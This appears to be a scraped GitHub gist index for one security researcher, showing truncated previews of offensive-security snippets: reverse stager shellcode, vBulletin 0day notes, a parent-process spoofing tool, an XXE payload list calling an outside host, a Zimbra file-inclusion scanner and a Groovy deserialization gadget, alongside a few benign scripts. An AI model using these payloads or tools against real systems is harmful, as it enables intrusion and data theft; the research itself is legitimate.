John Troon JohnTroony
@JohnTroony
JohnTroony / reverse_stager_shellcode.asm
Last active Dec 2, 2019
x86 Shellcoding: PoC code for connect-back shellcode that fetches a second-stage shellcode and executes it.
View reverse_stager_shellcode.asm
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
@JohnTroony
JohnTroony / reverse_staged_shellcode.c
Created Nov 25, 2019
Windows Shellcoding: PoC code for connect-back shellcode that fetches a second-stage shellcode and executes it.
View reverse_staged_shellcode.c
#include<stdio.h>
#include<winsock2.h>
//Winsock Library
#pragma comment(lib,"ws2_32.lib")
// John (Troon) Ombagi
// Twitter/Github : @johntroony
int main(int argc, char **argv){
View 2019_vbulletin_0day_info.txt
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
$app = $this->application['handler'];
@JohnTroony
JohnTroony / perm_repeat.py
Last active Sep 27, 2019
Permutation of numbers with repetition.
View perm_repeat.py
#!/usr/bin/python
# John (Troon) Ombagi
# jayombagi@gmail.com
# PR(n, k) = n^k ----> Permutation with repetition.
import itertools
import sys
@JohnTroony
JohnTroony / terminator.config
Created Aug 9, 2019
custom config for terminator terminal on Kali Linux
View terminator.config
[global_config]
enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
[keybindings]
[profiles]
[[default]]
background_darkness = 0.83
background_type = transparent
cursor_color = "#aaaaaa"
show_titlebar = False
scrollback_infinite = True
View process_spoof.c
/* x86_64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View http-vuln-zimbra-lfi.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
View escapetest.c
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095
View kryo-1.xml
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando" reference="../../../.."/>
<owner class="java.lang.ProcessBuilder">
<command>